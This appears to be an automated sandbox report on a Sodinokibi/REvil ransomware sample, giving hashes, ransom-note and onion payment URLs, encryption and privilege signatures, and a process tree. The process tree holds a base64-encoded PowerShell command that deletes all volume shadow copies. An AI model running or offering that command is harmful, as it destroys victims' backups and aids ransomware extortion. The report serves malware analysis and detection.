Analysis
-
max time kernel
145s -
max time network
60s -
platform
windows10_x64 -
resource
win10v200722 -
submitted
10-08-2020 11:59
Static task
static1
Behavioral task
behavioral1
Sample
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Resource
win7
Behavioral task
behavioral2
Sample
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Resource
win10v200722
General
-
Target
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
-
Size
116KB
-
MD5
90e6ea15ed18005b431e135186d57abf
-
SHA1
d8e126cd0f5f3f214989c3533fd22c7291c44174
-
SHA256
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d
-
SHA512
91690e64b9d39b2b1c0fb7575d75d632f5fbe1dd6c36b935ea2fde1e7bbbfc0e68ba50d73919f4cb2502d7e2b46fe98a3ddcb217b3cb1da77fc290e86031c60d
Malware Config
Extracted
C:\iz0cns-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B6E9B7957F638FA
http://decryptor.cc/5B6E9B7957F638FA
Signatures
-
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exepowershell.exepid process 508 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe 508 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe 756 powershell.exe 756 powershell.exe 756 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription pid process target process PID 508 wrote to memory of 756 508 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe powershell.exe PID 508 wrote to memory of 756 508 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\11s.bmp" bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 508 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe Token: SeDebugPrivilege 756 powershell.exe Token: SeBackupPrivilege 2276 vssvc.exe Token: SeRestorePrivilege 2276 vssvc.exe Token: SeAuditPrivilege 2276 vssvc.exe Token: SeTakeOwnershipPrivilege 508 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe -
Drops file in Program Files directory 16 IoCs
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription ioc process File opened for modification \??\c:\program files\SaveSkip.pptx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\DisableFormat.i64 bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\EnterMount.vsx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\GetResize.eps bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RevokeDisconnect.midi bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files (x86)\iz0cns-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ConnectRegister.html bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ProtectExpand.docm bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\ReceiveStep.tif bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\EditRename.kix bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\UnpublishConvertTo.svgz bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\SetShow.xht bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File created \??\c:\program files\iz0cns-readme.txt bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RemoveUse.snd bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\RestartClose.xml bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\program files\SelectExport.pptx bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe -
Modifies extensions of user files 10 IoCs
Ransomware generally changes the extension on encrypted files.
Processes:
bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exedescription ioc process File renamed C:\Users\Admin\Pictures\SelectDeny.tif => \??\c:\users\admin\pictures\SelectDeny.tif.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\UnprotectUnregister.raw => \??\c:\users\admin\pictures\UnprotectUnregister.raw.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\EditOut.tiff => \??\c:\users\admin\pictures\EditOut.tiff.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\ConnectRename.tiff => \??\c:\users\admin\pictures\ConnectRename.tiff.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\users\admin\pictures\EditOut.tiff bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\users\admin\pictures\LimitExpand.tiff bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\ExportEnter.raw => \??\c:\users\admin\pictures\ExportEnter.raw.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\InitializeInvoke.crw => \??\c:\users\admin\pictures\InitializeInvoke.crw.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File renamed C:\Users\Admin\Pictures\LimitExpand.tiff => \??\c:\users\admin\pictures\LimitExpand.tiff.iz0cns bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe File opened for modification \??\c:\users\admin\pictures\ConnectRename.tiff bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe"C:\Users\Admin\AppData\Local\Temp\bbcaee51155609d365f6bb297d124efea685df0243ec1d4efb5043d9afe5963d.exe"1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
- Sets desktop wallpaper using registry
- Suspicious use of AdjustPrivilegeToken
- Drops file in Program Files directory
- Modifies extensions of user files
PID:508 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:756
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:836
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:2276